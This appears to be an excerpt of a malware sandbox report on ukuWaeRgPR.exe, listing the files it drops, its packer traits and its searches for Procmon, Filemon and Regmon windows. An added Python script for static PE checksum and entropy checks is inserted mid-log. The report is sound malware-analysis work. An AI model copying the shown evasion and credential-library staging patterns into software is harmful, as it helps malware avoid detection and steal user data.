Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: ukuWaeRgPR.exe Static file information: File size 2462720 > 1048576
Source: ukuWaeRgPR.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x216000
Source: Binary string: mozglue.pdbP source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Unpacked PE file: 0.2.ukuWaeRgPR.exe.c80000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Unpacked PE file: 6.2.EHDHDHIECG.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 9.2.explorti.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 13.2.explorti.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Unpacked PE file: 14.2.a3b2c9311b.exe.60000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C37C410
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: explorti.exe.6.dr Static PE information: real checksum: 0x1e5b27 should be: 0x1ddbf1
Source: random[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0x263909
Source: ukuWaeRgPR.exe Static PE information: real checksum: 0x0 should be: 0x263909
Source: EHDHDHIECG.exe.0.dr Static PE information: real checksum: 0x1e5b27 should be: 0x1ddbf1
Source: a3b2c9311b.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x263909
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1e5b27 should be: 0x1ddbf1
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: avjczlwa
Source: amadka[1].exe.0.dr Static PE information: section name: sysspafc
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: .idata
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: avjczlwa
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: sysspafc
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: avjczlwa
Source: explorti.exe.6.dr Static PE information: section name: sysspafc
Source: explorti.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B536 push ecx; ret 0_2_6C34B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004BD82C push ecx; ret 13_2_004BD83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE2AA0 push 7EAE0002h; ret 14_2_7EAE2AAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE27A0 push 7EAE0002h; ret 14_2_7EAE27AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0CA0 push 7EAE0002h; ret 14_2_7EAE0CAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0FA0 push 7EAE0002h; ret 14_2_7EAE0FAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE12A0 push 7EAE0002h; ret 14_2_7EAE12AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE15A0 push 7EAE0002h; ret 14_2_7EAE15AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE18A0 push 7EAE0002h; ret 14_2_7EAE18AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1BA0 push 7EAE0002h; ret 14_2_7EAE1BAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1EA0 push 7EAE0002h; ret 14_2_7EAE1EAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE21A0 push 7EAE0002h; ret 14_2_7EAE21AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE24A0 push 7EAE0002h; ret 14_2_7EAE24AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE29B0 push 7EAE0002h; ret 14_2_7EAE29BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE26B0 push 7EAE0002h; ret 14_2_7EAE26BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0BB0 push 7EAE0002h; ret 14_2_7EAE0BBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0EB0 push 7EAE0002h; ret 14_2_7EAE0EBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE11B0 push 7EAE0002h; ret 14_2_7EAE11BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE14B0 push 7EAE0002h; ret 14_2_7EAE14BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE17B0 push 7EAE0002h; ret 14_2_7EAE17BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1AB0 push 7EAE0002h; ret 14_2_7EAE1ABF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1DB0 push 7EAE0002h; ret 14_2_7EAE1DBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE20B0 push 7EAE0002h; ret 14_2_7EAE20BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE23B0 push 7EAE0002h; ret 14_2_7EAE23BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE2980 push 7EAE0002h; ret 14_2_7EAE298F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0E80 push 7EAE0002h; ret 14_2_7EAE0E8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1180 push 7EAE0002h; ret 14_2_7EAE118F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1480 push 7EAE0002h; ret 14_2_7EAE148F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1780 push 7EAE0002h; ret 14_2_7EAE178F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1A80 push 7EAE0002h; ret 14_2_7EAE1A8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1D80 push 7EAE0002h; ret 14_2_7EAE1D8F
Source: ukuWaeRgPR.exe Static PE information: section name: entropy: 7.995655155988397
Source: ukuWaeRgPR.exe Static PE information: section name: entropy: 7.978560730889681
Source: ukuWaeRgPR.exe Static PE information: section name: entropy: 7.953798780964511
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.976322234409819
Source: amadka[1].exe.0.dr Static PE information: section name: avjczlwa entropy: 7.953937676701836
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: entropy: 7.976322234409819
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: avjczlwa entropy: 7.953937676701836
Source: explorti.exe.6.dr Static PE information: section name: entropy: 7.976322234409819
Source: explorti.exe.6.dr Static PE information: section name: avjczlwa entropy: 7.953937676701836
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.995655155988397
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.978560730889681
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.953798780964511
Source: a3b2c9311b.exe.13.dr Static PE information: section name: entropy: 7.995655155988397
Source: a3b2c9311b.exe.13.dr Static PE information: section name: entropy: 7.978560730889681
Source: a3b2c9311b.exe.13.dr Static PE information: section name: entropy: 7.953798780964511
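The static findings above (a CheckSum field stored as 0x0 in ukuWaeRgPR.exe, random[1].exe and a3b2c9311b.exe and a non-zero but wrong value in EHDHDHIECG.exe and amadka[1].exe, section headers with empty or non-printable names, and sections whose entropy is above 7.9 bits per byte) are the usual footprint of a packer, and they can be re-checked on any sample without a sandbox. The script below is an added example and not part of this report: it implements the PE CheckSum algorithm, walks the section table and flags nameless names, non-printable names and high-entropy sections using only the standard library. The minimal PE image it analyses is constructed inline for demonstration, and the 7.0-bit threshold is a conventional triage choice, not a value taken from the report. Two caveats a practitioner should keep in mind: Windows enforces the CheckSum only for kernel drivers and boot-time system DLLs, so a stored 0x0 on its own is weak evidence (many user-mode binaries ship that way), whereas a non-zero value that no longer matches usually means the image was modified after the linker wrote it; it is the combination with nameless, near-8-bit sections that points at packing.

```python
import math
import struct
from collections import Counter

# Added example, not part of the sandbox report: reproduce the static PE checks
# listed above (CheckSum mismatch, nameless or non-printable section names,
# near-8-bit section entropy) with the standard library only.


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE/COFF CheckSum as imagehlp computes it: sum every 32-bit word except the
    CheckSum field itself, folding carries, fold to 16 bits, then add the file length.
    checksum_offset is assumed 4-byte aligned, which holds for real PE headers."""
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_offset // 4
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, 8.0 when every byte value is equally likely."""
    if not blob:
        return 0.0
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values())


def analyse_pe(data: bytes, entropy_threshold: float = 7.0) -> dict:
    """Walk the headers with struct (no pefile needed) and flag what the report flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24            # optional header follows the 20-byte COFF header
    checksum_offset = opt + 64     # CheckSum sits at +64 in both PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    computed = pe_checksum(data, checksum_offset)
    sections = []
    for k in range(n_sections):
        hdr = opt + opt_size + 40 * k
        raw_name = data[hdr:hdr + 8].rstrip(b"\0")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
        entropy = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        sections.append({
            "name": raw_name.decode("latin-1"),
            "nameless": raw_name == b"",
            "special_chars": any(b < 0x21 or b > 0x7E for b in raw_name),
            "raw_size": raw_size,
            "entropy": entropy,
            "high_entropy": entropy > entropy_threshold,
        })
    return {"stored_checksum": stored, "computed_checksum": computed,
            "checksum_mismatch": stored != computed, "sections": sections}


def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE32 image for the demo, not one of the report's files.
    The CheckSum field is left at 0, as in the samples above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    header_len = 0x40 + 4 + 20 + 224 + 40 * len(sections)
    raw_ptr = (header_len + 0x1FF) // 0x200 * 0x200                # first raw data at FileAlignment
    table, bodies, vaddr = bytearray(), bytearray(), 0x1000
    for name, body in sections:
        table += name.ljust(8, b"\0")[:8] + struct.pack(
            "<IIIIIIHHI", len(body), vaddr, len(body), raw_ptr + len(bodies), 0, 0, 0, 0, 0x60000020)
        bodies += body
        vaddr += 0x1000
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return image.ljust(raw_ptr, b"\0") + bytes(bodies)


SAMPLE_PE = build_sample_pe([
    (b".text", bytes(256)),            # zero-filled: entropy 0.0
    (b"", bytes(range(256))),          # nameless, every byte value once: entropy 8.0
    (b"\x01\x02ab", b"AB" * 128),      # non-printable name, two symbols: entropy 1.0
])

if __name__ == "__main__":
    result = analyse_pe(SAMPLE_PE)
    print(f"checksum: stored 0x{result['stored_checksum']:x}, computed 0x{result['computed_checksum']:x}")
    for s in result["sections"]:
        flags = " ".join(f for f in ("nameless", "special_chars", "high_entropy") if s[f])
        print(f"  {s['name']!r:12} size={s['raw_size']:5} entropy={s['entropy']:.3f} {flags}")
```

To run it on a real dropped file, replace SAMPLE_PE with the bytes of the file; the `push imm32; ret` sequences the sandbox lists above are a dynamic finding (control-flow obfuscation in unpacked code) and are not something this static pass will see.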
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: Filemonclass
